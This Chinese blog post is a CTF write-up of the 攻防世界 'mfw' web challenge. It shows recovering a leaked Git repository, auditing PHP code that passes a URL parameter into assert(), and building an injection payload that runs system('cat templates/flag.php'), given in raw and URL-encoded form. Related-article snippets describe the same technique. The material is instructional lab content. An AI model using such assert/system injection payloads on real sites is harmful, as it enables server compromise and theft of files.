攻防世界 mfw

最新推荐文章于 2024-08-18 23:46:40 发布
最新推荐文章于 2024-08-18 23:46:40 发布
阅读量158 收藏 1
点赞数 2
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63640108/article/details/139416229
版权

打开题目

查看源码secret在page=flag

为空

点开这About界面显示

它使用了Git源码托管

githacker尝试一下

源码里有个flag.php

点开没有有用信息

这四个逐一点开后都没有进展

代码审计index.php

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

assert()

其与eval()类似,传入的内容会被当做代码来执行,不同的是eval中传入的值可以不用分号来结尾。

示例代码:

<?php
highlight_file(__FILE__);

$arg = $_REQUEST['value'];
assert($arg);
?>

同样也可以调用命令执行函数来执行系统命令

而且没有对page参数进行过滤现在的任务是构造payload让assert能执行命令查看flag

') or system("cat templates/flag.php");//
url编码一下

')+or+system("cat templates/flag.php")%3b%2f%2f

空白页面

查看源码

找到flag

cyberpeace{828717e70fd361cc58607d8f0cc088d7}
璃怜月
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【网络安全 | CSAW】攻防世界mfw解题详析(Git泄露+命令执行)
等风来
05-29 4288
Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管理系统,并将其部署到生产环境中以维护其代码库。通过枚举工具或搜索引擎来查找带有.git文件夹的存储库,以获取包含未加密密码、凭据和敏感信息的站点代码库。由于该代码仅对目录遍历进行防范,因此可构造POC,执行系统命令。文件夹被直接部署到线上环境中,这可能会导致Git泄露问题。下载站点存储库的整个代码历史记录和配置信息。然而,在配置不当的情况下,可能会导致。由于下载得到的文件中,
攻防世界mfw_攻防世界小记
weixin_30682043的博客
12-24 395
前言这里挑选了一些个人认为有价值的题目,当然,正在不断攻克中,会不断更新的(暂时只更新一个专题)。Miscembarrass这道题是一道流量分析题,首先拿到流量包,发现有点大266MB(太大了,就不放出来了),估计有点东西,于是首先导出文件,发现有很多杂七杂八的东西,但是看过一遍后貌似没有什么有用的东东(比如压缩包啊啥的)??嗯??这么坑的吗?于是想到这种题多半是直接给了flag在字符串里面的,靠...
攻防世界mfw_攻防世界-Web-mfw
weixin_29054399的博客
01-14 160
题目信息:image.png工具:GitHack,dirsearch知识点:git漏洞、代码审计打开题目场景,检查网站,发现这样一个页面image.png访问.git目录,疑似存在git源码泄露image.png再用dirsearch扫描,发现git源码泄露:使用 GitHack获取源码image.png得到源码index.php中关键代码如下if (isset($_GET['page'])) {...
攻防世界 mfw git泄露构造闭合
m0_64180167的博客
10-07 300
这题也挺有想法 第一次确实没有想到。然后我们看index.php代码。我们githack 泄露一下。首先我们可以扫出 git。就是替换为cat即可。
攻防世界mfw--详细笔记
jkhdjkasd的博客
07-26 1135
攻防世界mfw--详细笔记
攻防世界mfw解题wp
qq_56426046的博客
10-09 649
开始点点点发现php源码,bootstrap写的,好像还有git备份,猜测git源码泄露。打开templates发现flag.php,但是没有。page参数拼接,还有assert可以进行命令执行。发现了/.git/目录,确定是git源码泄露。根据第二个assert函数构造payload。然后用dirbuster扫一下目录。url传参,查看源码发现flag。使用githack工具下载源码。打开index.php代码审计。只身千里客,孤枕一灯秋。
攻防世界——mfw
m0_62063669的博客
06-23 1525
攻防世界——mfw当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。发现有Git,可能是Git泄露,直接/.git 确实存在git泄露那我们使用GitHack还原在templates目录下发现了flag.php,在index.php中发现关键代码strpos()函数查找".."在$file中第一次出现的位置。如果没有找到则返回falsefile_exists()函数检查$file是否存在assert()函数会将括号中的
攻防世界mfw_攻防世界--web高级writeup
weixin_29963537的博客
01-14 201
根据大佬们的writeup作出来后,自我整理下知识点及分类php目录htmlmfw git泄露app 注意 page=about ,能够传数据且用git写可能有git泄露传flag为空,表明有文件,若是报错,是没有webstorm git泄露函数 查看flag.php没有东西查看index.php page没有通过任何过滤和处理,因此能够传递参数闭合strpos函数设置page为'.system...
攻防世界-web-mfw
wuh2333的博客
06-28 614
攻防世界mfw
mfw-bootstrap
04-02
在压缩包文件"mfw-bootstrap-main"中,我们可以期待找到以下关键文件和目录: 1. **index.html** - 这通常是项目的主入口文件,展示了如何引入和使用Bootstrap模板及组件。 2. **css** - 包含自定义CSS样式文件,...
调度组织_MFW.pptx
10-08
《调度组织在工业企业管理中的核心作用》 调度管理在工业企业的运营中扮演着至关重要的角色,它是企业高效运行的“指挥中心”、“信息中心”和“协调中心”。调度管理不仅涉及到对企业活动的指挥与运筹,而且在信息...
peach-pit-mfwMFW第一天示例
02-25
"peach-pit-mfw"似乎是一个项目或教程的名称,它以"MFW第一天示例"为主题,意在引导用户了解或学习某个特定的技术或流程。"MFW"可能是"Monday First Working"的缩写,暗示这是系列教程的第一天,通常会介绍基础概念...
Gjhnsn.github.io:MFW投资组合
03-30
2. **个人投资组合**: MFW投资组合可能代表一个特定的投资模型或策略,用户可以在此展示他们的投资选择、历史回报和风险管理策略。这样的网站通常包括投资组合概述、资产配置、市场分析和投资目标等内容。 3. **...
角度转换、坐标转换.zip_MFW_T4V_angle转换_坐标转换_弧度 坐标正反算
07-14
角度转弧度,弧度转角度, 坐标的正算,坐标的反算
[第五空间 2021]EasyCleanup
liaochonxiang的博客
08-18 107
注意的是,如果我们只上传一个文件,这里也是不会遗留下Session文件的,所以表单里必须有两个以上的文件上传。【文件包含&条件竞争】利用session.upload_progress文件包含进行RCE。
Android逆向题解攻防世界-easy-apk
u013170888的博客
08-14 386
魔改码表与标准码表参照对比,将加密字符串还原成标准码表编码的字符串,再标准base64解码即可。运行结果:flag{05397c42f9b6da593a3644162d36eb01}题目比较简单,就是一个改了码表的base64编码。
android 11添加property遇到的selinux问题
最新发布
sdkdlwk的博客
08-18 178
dac_override 是一种典型的neverallow权限,要添加dac_override权限必须是coredomain才能添加,如果不是coredomain是没有办法添加这种neverallow权限的,也就是说在device/qcom/sepolicy/目录下添加的文件是不可能有dac_override权限的,如何添加coredomain修改如问题1所示。/system/sepolicy/private/目录下添加addnew.te 文件。:xxx.ignore.cil使用。
RabbitMQ-消息队列之routing使用
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
08-17 293
RabbitMQ-消息队列之routing使用
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值